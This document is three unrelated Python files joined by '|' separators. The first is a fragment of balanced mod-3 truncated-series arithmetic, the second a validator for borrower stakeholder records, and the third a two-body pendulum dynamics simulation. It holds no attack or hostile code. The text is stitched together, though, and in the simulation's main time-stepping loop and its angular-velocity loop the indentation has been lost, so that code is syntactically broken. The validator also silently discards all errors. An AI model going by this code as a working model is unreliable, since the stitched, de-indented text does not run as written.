    shifted = {
        0: (a, b, c),
        1: (0, a, b),
        2: (0, 0, a),
        3: (0, 0, 0),
    }
    return shifted.get(j)
def inversefr(a, b, c, i):
    """Invert the coefficient triple via inverse() and negate the exponent i."""
    inverted = inverse(a, b, c)
    return inverted, -i
def inverse(a, b, c):
    """
    Invert a truncated series with unit leading coefficient (a == +-1),
    normalizing the result.  Raises ValueError when a == 0 (not
    invertible); any other a falls through and yields None.
    """
    if a == 0:
        raise ValueError("divisible by p")
    if a == 1:
        return normal(1, -b, -c + b**2)
    if a == -1:
        return normal(-1, -b, c + b**2)
def normal(a, b, c):
    """
    Normalize a coefficient triple: reduce b and c with mod3 and fold a
    leading +-2 into the balanced range, adjusting c.  Values of a with
    |a| > 2 fall through and yield None.
    """
    if abs(a) < 2:
        return a, mod3(b), mod3(c)
    if a == 2:
        return -1, mod3(b), mod3(c - 1)
    if a == -2:
        return 1, mod3(b), mod3(c + 1)
def mod3(a):
    """Balanced residue of a mod 3: result lies in {-1, 0, 1} instead of {0, 1, 2}."""
    residue = a % 3
    return residue if residue != 2 else -1
def add(v):
    """Component-wise balanced-mod-3 sum of the two triples in v, normalized."""
    sums = [mod3(x + y) for x, y in zip(v[0], v[1])]
    return normal(sums[0], sums[1], sums[2])
def mul(v):
    """
    Truncated product of the two coefficient triples in v (treated as
    series a + b*p + c*p^2): standard polynomial multiplication with
    each coefficient reduced by mod3 and the result normalized.

    NOTE(review): returns a one-element list, unlike add() which
    returns a bare tuple — confirm callers expect the wrapping.
    """
    return [normal(mod3(v[0][0] * v[1][0]), mod3(v[0][0] * v[1][1] + v[0][1] * v[1][0]), mod3(v[0][0] * v[1][2] + v[0][1]*v[1][1] + v[0][2] * v[1][0]))]
|
from validators.subsystems import bscode
from datasetrecords import models
from validators.subsystems import checkstatus
from validators.subsystems import checkformat
from validators.subsystems import checkenforcements
from validators.subsystems.datasets import pivalidate
from validators.subsystems.datasets import ibvalidate
from validators.subsystems.datasets import validationstatus
from branchcode import models as branchcodemodels
class BSValidate(ibvalidate.IBValidate):
    """
    Validator for Borrower Stakeholder ("BS") dataset records.

    For each supported field name, check_data_in_field() walks every
    BORROWERSTAKEHOLDER record and applies the supplied rule list:
    "M" (mandatory), dict entries (prioritised enforcement checks) and
    any other entry (the field's format check).
    """

    def __init__(self, code="BS"):
        super(BSValidate, self).__init__(code=code)
        # model and record set under validation
        self._model = models.BORROWERSTAKEHOLDER
        self.all_records = self.filter_new_old_records(models.BORROWERSTAKEHOLDER)
        self.headers = branchcodemodels.RequiredHeader.objects.all()
        self.code = code
        self.pi_c_code = bscode.BSCode(self._model, self.code)
        self.set_code(self.pi_c_code)

    def check_data_in_field(self, f, rules):
        """
        Generator yielding validation results for field *f*.

        rules: iterable mixing "M" (mandatory), dicts describing two
        prioritised enforcement rule sets per key, and any other value
        (triggers the field-specific format check).  Yields the
        accumulated ``self.passed`` dict, keyed by field value, mapping
        to per-rule outcomes ("Mandatory", "ENF", "FORMAT").

        NOTE(review): the "ENF"/"FORMAT" assignments index into
        ``self.passed[value]`` and assume the "M" rule ran first and
        created the entry — confirm rule ordering upstream.
        """
        self.passed = { }
        try:
            if(f == "PI_Identification_Code"):
                self.pass_pi = {}
                self.by_id = {}
                for records in self.all_records:
                    for r in rules:
                        if r == "M":
                            # mandatory: the value must be present/truthy
                            if(records.PI_Identification_Code.pi_identification_code):
                                self.passed[records.PI_Identification_Code.pi_identification_code]={"Mandatory":True}
                            else:
                                self.passed[records.PI_Identification_Code.pi_identification_code]={"Mandatory":False}
                        elif(isinstance(r, dict)):
                            for key in r:
                                self.first_priority = self.check_dict_values(r.get(key)[0])
                                self.second_priority = self.check_dict_values(r.get(key)[1])
                                if(self.first_priority == 1 or self.first_priority == 2):
                                    # prioritised: run the second check only if the first passes
                                    self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.PI_Identification_Code.pi_identification_code, priority=r.get(key))
                                    self.validation_first = self.vstatus.validate_field(records.PI_Identification_Code.pi_identification_code)
                                    if(self.validation_first == True):
                                        #Perform the second validation
                                        self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.PI_Identification_Code.pi_identification_code, priority=r.get(key))
                                        self.validation_second = self.sec_enf.validate_field(records.PI_Identification_Code.pi_identification_code, headers=self.headers)
                                        if(self.validation_second == True):
                                            self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=True
                                        else:
                                            self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=False
                                    else:
                                        self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=False
                                else:
                                    # unprioritised: both validations must pass
                                    self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.PI_Identification_Code.pi_identification_code, priority=r.get(key))
                                    self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.PI_Identification_Code.pi_identification_code, priority=r.get(key))
                                    self.validation_first = self.vstatus.validate_field(records.PI_Identification_Code.pi_identification_code)
                                    self.validation_second = self.sec_enf.validate_field(records.PI_Identification_Code.pi_identification_code, headers=self.headers)
                                    if(self.validation_first == True):
                                        if(self.validation_second == True):
                                            self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=True
                                        else:
                                            self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=False
                                    else:
                                        self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=False
                        else:
                            # format: at most 8 characters after removing dashes
                            if(records.PI_Identification_Code):
                                self.parseddata = records.PI_Identification_Code.pi_identification_code.replace("-", "", 10)
                                if(len(self.parseddata) <= 8):
                                    self.passed[records.PI_Identification_Code.pi_identification_code]["FORMAT"]=True #checkformat.sub_alphanumeric(records.PI_Identification_Code.pi_identification_code.strip())
                                else:
                                    self.passed[records.PI_Identification_Code.pi_identification_code]["FORMAT"]=False
                            else:
                                self.passed[str(records.PI_Identification_Code.pi_identification_code)]["FORMAT"]=False
                yield self.passed
            elif(f == "Branch_Identification_Code"):
                self.pass_it = { }
                for records in self.all_records:
                    for r in rules:
                        if r == "M":
                            if(records.Branch_Identification_Code.branch_code):
                                self.passed[records.Branch_Identification_Code.branch_code]={"Mandatory":True}
                            else:
                                self.passed[records.Branch_Identification_Code.branch_code]={"Mandatory":False}
                        elif(isinstance(r, dict)):
                            for key in r:
                                self.first_priority = self.check_dict_values(r.get(key)[0])
                                self.second_priority = self.check_dict_values(r.get(key)[1])
                                if(self.first_priority == 1 or self.first_priority == 2):
                                    self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.Branch_Identification_Code.branch_code, priority=r.get(key))
                                    self.validation_first = self.vstatus.validate_field(records.Branch_Identification_Code.branch_code)
                                    if(self.validation_first == True):
                                        #Perform the second validation
                                        # NOTE(review): unlike the other field branches, headers= is
                                        # passed the branch code itself (not self.headers), and a
                                        # failed first validation leaves "ENF" unset here — confirm.
                                        self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.Branch_Identification_Code.branch_code, priority=r.get(key))
                                        self.validation_second = self.sec_enf.validate_field(records.Branch_Identification_Code.branch_code, headers=records.Branch_Identification_Code.branch_code)
                                        if(self.validation_second == True):
                                            self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=True
                                        else:
                                            self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=False
                                else:
                                    self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.Branch_Identification_Code.branch_code, priority=r.get(key))
                                    self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.Branch_Identification_Code.branch_code, priority=r.get(key))
                                    self.validation_first = self.vstatus.validate_field(records.Branch_Identification_Code.branch_code)
                                    self.validation_second = self.sec_enf.validate_field(records.Branch_Identification_Code.branch_code, headers=records.Branch_Identification_Code.branch_code)
                                    if(self.validation_first == True):
                                        if(self.validation_second == True):
                                            self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=True
                                        else:
                                            self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=False
                                    else:
                                        self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=False
                        else:
                            # format: numeric, at most 15 characters, non-blank after stripping
                            if(len(records.Branch_Identification_Code.branch_code) <= 15):
                                if(str(records.Branch_Identification_Code.branch_code).strip().lstrip().rstrip()):
                                    self.passed[records.Branch_Identification_Code.branch_code]["FORMAT"]=checkformat.is_numeric(records.Branch_Identification_Code.branch_code)
                                else:
                                    self.passed[records.Branch_Identification_Code.branch_code]["FORMAT"]=False
                            else:
                                self.passed[records.Branch_Identification_Code.branch_code]["FORMAT"]=False
                yield self.passed
            elif(f == "Borrowers_Client_Number"):
                self.pass_in = {}
                for records in self.all_records:
                    for r in rules:
                        if r == "M":
                            if(records.Borrowers_Client_Number.Client_Number):
                                self.passed[records.Borrowers_Client_Number.Client_Number]={"Mandatory":True}
                            else:
                                self.passed[records.Borrowers_Client_Number.Client_Number]={"Mandatory":False}
                        elif(isinstance(r, dict)):
                            for key in r:
                                self.first_priority = self.check_dict_values(r.get(key)[0])
                                self.second_priority = self.check_dict_values(r.get(key)[1])
                                if(self.first_priority == 1 or self.first_priority == 2):
                                    self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.Borrowers_Client_Number.Client_Number, priority=r.get(key))
                                    self.validation_first = self.vstatus.validate_field(records.Borrowers_Client_Number.Client_Number)
                                    if(self.validation_first == True):
                                        #Perform the second validation
                                        self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.Borrowers_Client_Number.Client_Number, priority=r.get(key))
                                        self.validation_second = self.sec_enf.validate_field(records.Borrowers_Client_Number.Client_Number, headers=self.headers)
                                        if(self.validation_second == True):
                                            self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=True
                                        else:
                                            self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=False
                                    else:
                                        self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=False
                                else:
                                    self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.Borrowers_Client_Number.Client_Number, priority=r.get(key))
                                    self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.Borrowers_Client_Number.Client_Number, priority=r.get(key))
                                    self.validation_first = self.vstatus.validate_field(records.Borrowers_Client_Number.Client_Number)
                                    self.validation_second = self.sec_enf.validate_field(records.Borrowers_Client_Number.Client_Number, headers=self.headers)
                                    if(self.validation_first == True):
                                        if(self.validation_second == True):
                                            self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=True
                                        else:
                                            self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=False
                                    else:
                                        self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=False
                        else:
                            # format: at most 30 characters
                            if(records):
                                if(len(records.Borrowers_Client_Number.Client_Number) <= 30):
                                    self.passed[records.Borrowers_Client_Number.Client_Number]["FORMAT"]=True #checkformat.sub_alphanumeric(records.Client_Number)
                                else:
                                    self.passed[records.Borrowers_Client_Number.Client_Number]["FORMAT"]=False
                            else:
                                self.passed[records.Borrowers_Client_Number.Client_Number]["FORMAT"]=False
                yield self.passed
            elif(f == "Stakeholder_Type"):
                self.pass_lid = {}
                for records in self.all_records:
                    for r in rules:
                        if r == "M":
                            if(records.Stakeholder_Type):
                                self.passed[records.Stakeholder_Type]={"Mandatory":True}
                            else:
                                self.passed[records.Stakeholder_Type]={"Mandatory":False}
                        elif(isinstance(r, dict)):
                            # single (unprioritised) enforcement check per key
                            for key in r:
                                self.statuss = checkenforcements.check_enforcements(key, self._model, records.Stakeholder_Type, priority=r.get(key))
                                self.passed[records.Stakeholder_Type]["ENF"]=self.statuss.validate_field(records.Stakeholder_Type)
                        else:
                            # format: exactly one numeric character
                            if(records):
                                if(len(records.Stakeholder_Type) == 1):
                                    self.passed[records.Stakeholder_Type]["FORMAT"]=checkformat.is_numeric(records.Stakeholder_Type)
                                else:
                                    self.passed[records.Stakeholder_Type]["FORMAT"]=False
                            else:
                                self.passed[records.Stakeholder_Type]["FORMAT"]=False
                yield self.passed
            elif(f == "Stakeholder_Category"):
                self.pass_lid = {}
                for records in self.all_records:
                    for r in rules:
                        if r == "M":
                            if(records.Stakeholder_Category):
                                self.passed[records.Stakeholder_Category]={"Mandatory":True}
                            else:
                                self.passed[records.Stakeholder_Category]={"Mandatory":False}
                        elif(isinstance(r, dict)):
                            for key in r:
                                self.statuss = checkenforcements.check_enforcements(key, self._model, records.Stakeholder_Category, priority=r.get(key))
                                self.passed[records.Stakeholder_Category]["ENF"]=self.statuss.validate_field(records.Stakeholder_Category)
                        else:
                            # format: exactly one numeric character
                            if(records):
                                if(len(records.Stakeholder_Category) == 1):
                                    self.passed[records.Stakeholder_Category]["FORMAT"]=checkformat.is_numeric(records.Stakeholder_Category)
                                else:
                                    self.passed[records.Stakeholder_Category]["FORMAT"]=False
                            else:
                                self.passed[records.Stakeholder_Category]["FORMAT"]=False
                yield self.passed
            elif(f == "Shareholder_Percentage"):
                self.pass_lid = {}
                for records in self.all_records:
                    for r in rules:
                        if r == "M":
                            if(records.Shareholder_Percentage):
                                self.passed[records.Shareholder_Percentage]={"Mandatory":True}
                            else:
                                self.passed[records.Shareholder_Percentage]={"Mandatory":False}
                        elif(isinstance(r, dict)):
                            for key in r:
                                self.statuss = checkenforcements.check_enforcements(key, self._model, records.Shareholder_Percentage, priority=r.get(key))
                                self.passed[records.Shareholder_Percentage]["ENF"]=self.statuss.validate_field(records.Shareholder_Percentage)
                        else:
                            # format: non-empty and parseable as a float
                            if(records):
                                if(len(records.Shareholder_Percentage) >= 1):
                                    self.passed[records.Shareholder_Percentage]["FORMAT"]=checkformat.is_float(records.Shareholder_Percentage)
                                else:
                                    self.passed[records.Shareholder_Percentage]["FORMAT"]=False
                            else:
                                self.passed[records.Shareholder_Percentage]["FORMAT"]=False
                yield self.passed
        except Exception as e:
            # Log
            # NOTE(review): every validation error is silently swallowed
            # here — add logging before relying on this in production.
            pass
|
import os
os.chdir("C:\\Users\\Logan\\Desktop\\simEngine3D")
from pendulum_function import pendulum
import numpy as np
from constraints_in import constraints_in
from simEngine3D_dataload import data_file, DP1_PHI_partials,CD_PHI_partials,DP2_PHI_partials,D_PHI_partials, body
from simEngine3D_functions import build_p, build_A, calc_phi, calc_partials, build_ja,build_G,tilde,calc_nue,check_phi,calc_gamma,build_E,build_p_from_A,calc_partials_HW82
from simEngine3D_functions import calc_phi_HW82
import matplotlib.pyplot as plt
from new_partials import DP1_phi_parital_lagrange,CD_phi_parital_lagrange
import time as ttime
import time as ttime
tic=ttime.perf_counter()
# Read in body and constraint information
file="C:\\Users\\Logan\\Desktop\\simEngine3D\\HW8_P2_input.txt"
X=data_file(file)
constraint_list=constraints_in(file)
#
# Simulation parameters: step size h, link length L, square cross
# section 0.05 x 0.05; rho=7800 (presumably steel — confirm).  Body 2
# has half the volume/mass of body 1.
h=0.01
L=2
xa=0.05*0.05
volume=xa*L
rho=7800
m1=rho*volume
m2=rho*volume/2
counter=0
time_list=np.arange(0,200+h,h)
time=time_list[0]
# driving function and its derivative disabled for this run
#df=np.pi*np.sin(2*time)*np.cos((np.pi*np.cos(time*2))/4)*-1/2
#ddf=np.pi**2*np.sin(time*2)**2*np.sin((np.pi*np.cos(time*2))/4)*(-1/4)-np.pi*np.cos(time*2)*np.cos((np.pi*np.cos(time*2))/4)
df=0
ddf=0
# nb bodies, nc constraints
nb=2
nc=len(constraint_list)
# Pre-allocated state histories; rows stack both bodies' coordinates
r_list=np.zeros([3*nb,len(time_list)])
r_d_list=np.zeros([3*nb,len(time_list)])
r_dd_list=[]
p_list=np.zeros([4*nb,len(time_list)])
p_d_list=np.zeros([4*nb,len(time_list)])
p_dd_list=[]
lambda_p_list=[]
lagrange_list=[]
# Gravity loads (z direction) stacked into a single 6x1 force vector
F1=np.array([0,0,m1*-9.81])
F1.shape=(3,1)
F2=np.array([0,0,m2*-9.81])
F2.shape=(3,1)
F=np.zeros([6,1])
F[0:3]=F1
F[3:6]=F2
tau=np.array([0,0,0])
tau.shape=(3,1)
# set body j starting values
r_start=np.array([0,L,0])
A_start=np.zeros([3,3])
A_start[0,2]=np.cos(0)
A_start[1,0]=np.cos(0)
A_start[2,1]=np.cos(0)
p_start=build_p_from_A(A_start)
r_start.shape=(3,1)
p_start.shape=(4,1)
X[1].q[0:3]=r_start
X[1].q[3:]=p_start
X[1].A_rotation=build_A(X[1].q[3:])
X[1].r_dot=np.array([0,0,0])
X[1].p_dot=np.array([0,0,0,0])
# body 2 initial pose (rotated about x relative to body 1)
r_start=np.array([0,2*L,-L/2])
A_start=np.zeros([3,3])
A_start[0,2]=np.cos(0)
A_start[1,1]=np.cos(0)
A_start[2,0]=np.cos(np.pi)
p_start=build_p_from_A(A_start)
r_start.shape=(3,1)
p_start.shape=(4,1)
X[2].q[0:3]=r_start
X[2].q[3:]=p_start
X[2].A_rotation=build_A(X[2].q[3:])
X[2].r_dot=np.array([0,0,0])
X[2].p_dot=np.array([0,0,0,0])
#
tol=1e-5
phi=calc_phi_HW82(X,constraint_list,0)
check_phi(X,constraint_list,0,tol)
PHI_P=np.zeros([2,1])
for i in range(1,len(X)):
    # Euler-parameter normalization residual: (p.T p)/2 - 1/2
    PHI_P[i-1]=1/2*(X[i].q[3:].T @ X[i].q[3:]) - 1/2
# BUG FIX: the original tested `PHI_P.any() > tol`, which compares a
# boolean to the tolerance; compare each residual against tol instead.
if (np.abs(PHI_P) > tol).any():
    print("initial conditions do not satisfy PHI_P=0")
else:
    print("initial conditions satisfy PHI_P=0")
# Build the constraint jacobian at t=0 and split it into position
# (phi_r) and Euler-parameter (phi_p) partial blocks; the two bodies'
# columns occupy offset ranges in the stacked jacobian.
partials=calc_partials_HW82(X,constraint_list)
jacobian=np.vstack(partials)
phi_r=np.zeros([nc,6])
phi_r[:5,:]=jacobian[0:5,0:6]
phi_r[5:,:]=jacobian[5:,3:9]
#phi_p=jacobian[:,13:]
phi_p=np.zeros([nc,8])
phi_p[:5,:]=jacobian[0:5,9:17]
phi_p[5:,:]=jacobian[5:,13:]
# Store generalized coordinates at t=0
r_list[0:3,0:1]=X[1].q[0:3]
r_list[3:6,0:1]=X[2].q[0:3]
p_list[0:4,0:1]=X[1].q[3:]
p_list[4:8,0:1]=X[2].q[3:]
for i in X:
    i.r_dot.shape=(3,1)
    i.p_dot.shape=(4,1)
r_d_list[0:3,0:1]=X[1].r_dot
r_d_list[3:6,0:1]=X[2].r_dot
p_d_list[0:4,0:1]=X[1].p_dot
# BUG FIX: was p_d_list[4:10, ...]; the array has only 8 rows, so the
# out-of-range bound only worked because numpy clips slice limits.
p_d_list[4:8,0:1]=X[2].p_dot
nue=calc_nue(X,constraint_list,0)
check_nue=phi_r @ r_d_list[:,0] + phi_p @ p_d_list[:,0]
# BUG FIX: the original used .any(), which declares success if just one
# component matches; every component must satisfy the velocity equation.
if (check_nue == nue).all():
    print("initial conditions satisfy nue=0")
else:
    print("initial conditions do not satisfy nue=0")
P=np.zeros([2,8])
P[0,0:4]=X[1].q[3:].T
P[1,4:8]=X[2].q[3:].T
check_P=P @ p_d_list[:,0]
# BUG FIX: same .any() -> .all() correction as above.
if (check_P == np.array([0,0])).all():
    print("initial conditions satisfy P_p_dot=0")
else:
    print("initial conditions do not satisfy P_p_dot=0")
# Reset the acceleration / multiplier accumulators before the solve
r_dd_list=[]
p_dd_list=[]
lambda_p_list=[]
lagrange_list=[]
nue_list=[]
#%%
# Recompute the constraint jacobian and split into r- and p- blocks
partials=calc_partials_HW82(X,constraint_list)
jacobian=np.vstack(partials)
phi_r=np.zeros([nc,6])
phi_r[:5,:]=jacobian[0:5,0:6]
phi_r[5:,:]=jacobian[5:,3:9]
#phi_p=jacobian[:,13:]
phi_p=np.zeros([nc,8])
phi_p[:5,:]=jacobian[0:5,9:17]
phi_p[5:,:]=jacobian[5:,13:]
nue_values=calc_nue(X,constraint_list,df)
#phi_r=np.zeros([10,3*nb])
#phi_r[:,0:3]=jacobian[:,0:3] #get ri
#phi_r[:,3:6]=jacobian[:,3:6]
#
#phi_p=np.zeros([10,8])
#phi_p[:,0:4]=jacobian[:,6:10]
#phi_p[:,4:8]=jacobian[:,10:14]
gamma_values=calc_gamma(X,constraint_list,ddf)
# Translational mass matrix for the two bodies (block diagonal)
M1=m1*np.identity(3)
M2=m2*np.identity(3)
M=np.zeros([6,6])
M[0:3,0:3]=M1
M[3:6,3:6]=M2
# Body 1 inertia tensor; b, c are half the 0.05 cross-section sides —
# NOTE(review): confirm the halved dimensions match the intended formula.
J_bar1=np.zeros([3,3])
b=0.05/2
c=0.05/2
J_bar1[0,0]=1/12*m1*(b**2+c**2)
J_bar1[1,1]=1/12*m1*(L**2+c**2)
J_bar1[2,2]=1/12*m1*(L**2+b**2)
J_bar2=np.zeros([3,3])
# BUG FIX: body 2's inertia used m1 and `L/2**2` (which is L/4 by
# operator precedence); body 2 has mass m2 and half the length, so the
# squared length term must be (L/2)**2.
J_bar2[0,0]=1/12*m2*(b**2+c**2)
J_bar2[1,1]=1/12*m2*((L/2)**2+c**2)
J_bar2[2,2]=1/12*m2*((L/2)**2+b**2)
J_bar=[J_bar1,J_bar2]
# Euler-parameter mass blocks: J_P_i = 4 G_i.T J_bar_i G_i
G=[]
for i in range(1,len(X)):
    G.append(build_G(X[i].q[3:]))
J_P_list=[]
for i in range(0,len(G)):
    J_P_list.append(4*np.dot(np.dot(np.transpose(G[i]),J_bar[i]),G[i]))
J_P=np.zeros([8,8])
J_P[0:4,0:4]=J_P_list[0]
J_P[4:8,4:8]=J_P_list[1]
# Quadratic-velocity torque terms: tau_hat_i = 8 G_dot_i.T J_bar_i G_dot_i p_i
G_dot=[]
for i in range(1,len(X)):
    G_dot.append(build_G(X[i].p_dot))
tau_hat_list=[]
for i in range(0,len(G_dot)):
    tau_hat_list.append(8*np.dot(np.dot(np.dot(G_dot[i].T,J_bar[i]),G_dot[i]),X[i+1].q[3:]))
tau_hat=np.zeros([8,1])
tau_hat[0:4]=tau_hat_list[0]
tau_hat[4:8]=tau_hat_list[1]
# Euler-parameter normalization jacobian (one row per body)
P=np.zeros([2,8])
P[0,0:4]=X[1].q[3:].T
P[1,4:8]=X[2].q[3:].T
# Assemble the 26x26 augmented equations of motion:
# unknowns = [r_dd (6), p_dd (8), lambda_p (2), lagrange (10)]
LHS=np.zeros([26,26])
LHS[0:6,0:6]=M
LHS[0:6,16:26]=phi_r.T
LHS[6:14,6:14]=J_P
LHS[6:14,14:16]=P.T
LHS[6:14,16:26]=phi_p.T
LHS[14:16,6:14]=P
LHS[16:26,0:6]=phi_r
LHS[16:26,6:14]=phi_p
RHS=np.zeros([26,1])
gamma_p=[]
for i in range(1,len(X)):
    gamma_p.append(-2*np.dot(X[i].p_dot.T,X[i].p_dot)) #slide 473
RHS[0:6]=F
RHS[6:14]=tau_hat
RHS[14]=gamma_p[0]
RHS[15]=gamma_p[1]
gamma_hat=np.array(gamma_values) #remove eulear parameterization constraint
gamma_hat.shape=(10,1)
RHS[16:26]=gamma_hat
# Solve for initial accelerations and multipliers, and record them
unknowns=np.dot(np.linalg.inv(LHS),RHS)
r_dd_list.append(unknowns[0:6])
p_dd_list.append(unknowns[6:14])
lambda_p_list.append(unknowns[14:16])
lagrange_list.append(unknowns[16:26])
#%%
n=1
time=time_list[n]
for ii in range(1,len(time_list)):
time=time_list[ii]
r_dd=r_dd_list[n-1]
p_dd=p_dd_list[n-1]
lagrange=lagrange_list[n-1]
lambda_p=lambda_p_list[n-1]
z_0=np.zeros([7*nb+1*nb+nc,1])
z_0[0:3*nb]=r_dd_list[n-1]
z_0[3*nb:7*nb]=p_dd_list[n-1]
z_0[7*nb:7*nb+nb]=lambda_p_list[n-1]
z_0[7*nb+nb:]=lagrange_list[n-1]
tol=1e-4
error=1
count=1
while abs(error) > tol and count < 30:
if count == 1:
z=z_0
else:
z=z
beta_0=1
alpha1=1
lambda_p=z[14:16]
lagrange=z[16:26]
C_r_n=alpha1*r_list[:,n-1]
C_r_n.shape=(3*nb,1)
C_p_n=alpha1*p_list[:,n-1]
C_p_n.shape=(4*nb,1)
C_r_dot_n=alpha1*r_d_list[:,n-1]
C_r_dot_n.shape=(3*nb,1)
C_p_dot_n=alpha1*p_d_list[:,n-1]
C_p_dot_n.shape=(4*nb,1)
r=C_r_n+(beta_0**2)*(h**2)*z[0:3*nb]
p=C_p_n+(beta_0**2)*(h**2)*z[3*nb:7*nb]
r_d=C_r_dot_n+beta_0*h*z[0:3*nb]
p_d=C_p_dot_n+beta_0*h*z[3*nb:7*nb]
X_n=X
X_n[1].q[0:3]=r[0:3]
X_n[2].q[0:3]=r[3:6]
X_n[1].q[3:]=p[0:4]
X_n[2].q[3:]=p[4:8]
X_n[1].A_rotation=build_A(X_n[1].q[3:])
X_n[2].A_rotation=build_A(X_n[2].q[3:])
X_n[1].r_dot=r_d[0:3]
X_n[2].r_dot=r_d[3:6]
X_n[1].p_dot=p_d[0:4]
X_n[2].p_dot=p_d[4:8]
X_n[1].r_d_dot=z[0:3]
X_n[2].r_d_dot=z[3:6]
X_n[1].p_d_dot=z[6:10]
X_n[2].p_d_dot=z[10:14]
PHI=calc_phi_HW82(X_n,constraint_list,0)
PHI=np.array(PHI)
partials=calc_partials_HW82(X_n,constraint_list)
jacobian=np.vstack(partials)
#jacobian=build_ja(X,partials)
phi_r=jacobian[:,3:9]
phi_p=jacobian[:,13:]
nue_values=calc_nue(X_n,constraint_list,df)
#jacobian=jacobian[:-2,:] #remove euler parameterization constraint
# phi_r=np.zeros([10,6])
# phi_r[:,0:3]=jacobian[:,0:3] #get ri
# phi_r[:,3:6]=jacobian[:,3:6]
#
# phi_p=np.zeros([10,8])
# phi_p[:,0:4]=jacobian[:,6:10]
# phi_p[:,4:8]=jacobian[:,10:14]
#
for i in range(1,len(X)):
PHI_P[i-1]=1/2*(X_n[i].q[3:].T @ X_n[i].q[3:]) - 1/2
G_dot=[]
for i in range(1,len(X)):
G_dot.append(build_G(X_n[i].p_dot))
tau_hat_list=[]
for i in range(0,len(G_dot)):
tau_hat_list.append(8*np.dot(np.dot(np.dot(G_dot[i].T,J_bar[i]),G_dot[i]),X_n[i+1].q[3:]))
G=[]
for i in range(1,len(X)):
G.append(build_G(X_n[i].q[3:]))
J_P_list=[]
for i in range(0,len(G)):
J_P_list.append(4*np.dot(np.dot(np.transpose(G[i]),J_bar[i]),G[i]))
P=np.zeros([2,8])
P[0,0:4]=X[1].q[3:].T
P[1,4:8]=X[2].q[3:].T
g=np.zeros([8*nb+nc,1])
g[0:3*nb]=M @ z[0:3*nb] + phi_r.T @ z[16:26] - F
g[3*nb:3*nb+4*nb] = J_P @ z[3*nb:3*nb+4*nb] + phi_p.T @ z[16:26] + P.T @ z[14:16]- tau_hat
g[3*nb+4*nb:3*nb+4*nb+nb]=1/((beta_0**2)*(h**2))*PHI_P
last_g=(1/((beta_0**2)*(h**2)) * PHI)
last_g.shape=(nc,1)
g[3*nb+4*nb+nb:3*nb+4*nb+nb+nc]=last_g
PSI=np.zeros([8*nb+nc,8*nb+nc])
PSI[0:3*nb,0:3*nb]=M
PSI[0:3*nb,3*nb+4*nb+nb:3*nb+4*nb+nb+nc]=phi_r.T
PSI[3*nb:3*nb+4*nb,3*nb:3*nb+4*nb]=J_P
PSI[3*nb:3*nb+4*nb,3*nb+4*nb:3*nb+4*nb+nb]=P.T
PSI[3*nb:3*nb+4*nb,3*nb+4*nb+nb:3*nb+4*nb+nb+nc]=phi_p.T
PSI[3*nb+4*nb:3*nb+4*nb+nb,3*nb:3*nb+4*nb]=P
PSI[3*nb+4*nb+nb:3*nb+4*nb+nb+nc,0:3*nb]=phi_r
PSI[3*nb+4*nb+nb:3*nb+4*nb+nb+nc,3*nb:3*nb+4*nb]=phi_p
delta_z=-np.dot(np.linalg.inv(PSI),g)
z=z+delta_z
error=np.linalg.norm(delta_z)
count=count+1
if count > 29:
print("did not converge")
nue_values=calc_nue(X_n,constraint_list,df)
nue_list.append(nue_values)
vel=phi_r @ r_d + phi_p @ p_d
# vel_violation.append(np.linalg.norm(vel))
r_list[:,n:n+1]=r
p_list[:,n:n+1]=p
r_d_list[:,n:n+1]=r_d
p_d_list[:,n:n+1]=p_d
r_dd_list.append(z[0:6])
p_dd_list.append(z[6:14])
lambda_p_list.append(z[14:16])
lagrange_list.append(z[16:26])
# G=build_G(p)
# torque=[]
# for kk in range(0,len(constraint_list)):
# torque.append(-1/2*G @ phi_p[kk,:] * z[8+kk])
# torque=-0.5*(G @ phi_p[5] * z[13:14])
# torque=phi_p.T @ z[8:14] + P.T @ z[7:8]
# torque_list.append(torque)
n=n+1
toc=ttime.perf_counter()
elapsed_time=toc-tic
print(elapsed_time)
#%%
# --- Post-processing: body-1 position trajectories. ---
xx=r_list[0,:]
yy=r_list[1,:]
zz=r_list[2,:]
fig, axs = plt.subplots(3)
axs[0].set(title="Body 1 point O'")
axs[0].plot(time_list,xx)
axs[0].set(ylabel='x')
axs[1].plot(time_list,yy)
axs[1].set(ylabel='y')
axs[2].plot(time_list,zz)
axs[2].set(ylabel='z')
axs[2].set(xlabel='time')
#%%calculate omega
# Angular velocity of body 1: omega = 2 E(p) p_dot.
E_list=[]
for i in range(0,max(p_list.shape)):
E_list.append(build_E(p_list[:4,i]))
omega_list=np.zeros([3,max(p_list.shape)])
for i in range(0,max(p_d_list.shape)):
omega=2*(np.dot(E_list[i], p_d_list[:4,i]))
omega.shape=(3,1)
omega_list[:,i:i+1]=omega
omx=omega_list[0,:]
